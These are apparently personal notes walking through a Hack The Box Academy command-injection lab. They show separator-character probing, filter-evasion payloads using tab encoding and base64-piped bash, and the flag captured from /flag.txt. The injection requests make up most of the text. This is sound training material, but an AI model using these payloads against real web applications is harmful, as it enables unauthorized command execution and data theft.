CMD INJECTIONS

LogoCompleted Command Injectionsacademy.hackthebox.com

OBJECTIVE: Test for command injection vulnerabilities against the target web application

What is the content of '/flag.txt'?
root@oco:~$ BROWSER > 94.237.58.94:32878
 * guest:guest
 * review the functionality of the webapp
 
NOTE: It is always easier to inject our command in an input going at the end of the command, rather than in the middle of it, though both are possible.
 
#test the web app for cmd injection
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port} > click "copy to" on any file > "move"
BURP > Proxy > Intercept > Raw > right-click > send to repeater
 Request
  ...
  GET /index.php?to=;&from=51459716.txt&finish=1&move=1 HTTP/1.1
  * keep sending each of the cmd injection discovery characters for identification
    the one that processes the expected input w/o issues is the unfiltered character to be used in the cmd injection attack
     - ;, \n, &, |, &&, || ``, $(), %3b, %0a, %26, %7c, %26%26, %7c%7c, %60%60, %24%28%29
 Response
  ...
  HTTP/1.1 200 OK...error while moving
  
#identify which cmd injection is acceptable.
 Request
  ...
  GET /index.php?to=;whoami&from=51459716.txt&finish=1&move=1 HTTP/1.1
 Response
  ...
  Malicious Request Denied
  
#obfuscate cmds
 Request
  ...
 GET /index.php?to=;cat%09/flag.txt&from=51459716.txt&finish=1&move=1 HTTP/1.1
 Response
  ...
  Malicious Request Denied
  
 Request
  ...
  GET /index.php?to=;ca$@t%09/flag.txt&from=51459716.txt&finish=1&move=1 HTTP/1.1
 Response
  ...
  Malicious Request Denied
  
#create the payload and obfuscate
root@oco:~$ echo -n 'cat /flag.txt' | base64
 Y2F0IC9mbGFnLnR4dA==

 Request
  ...
 GET /index.php?to=%0a%09bash<<<$(base64%09-d<<<Y2F0IC9mbGFnLnR4dA==)&from=51459716.txt&finish=1&move=1 HTTP/1.1
 Response
  ...
  HTB{c0mm4nd3r_1nj3c70r}
PreviousSQLMAPNextFILE UPLOAD ATTACKS

Last updated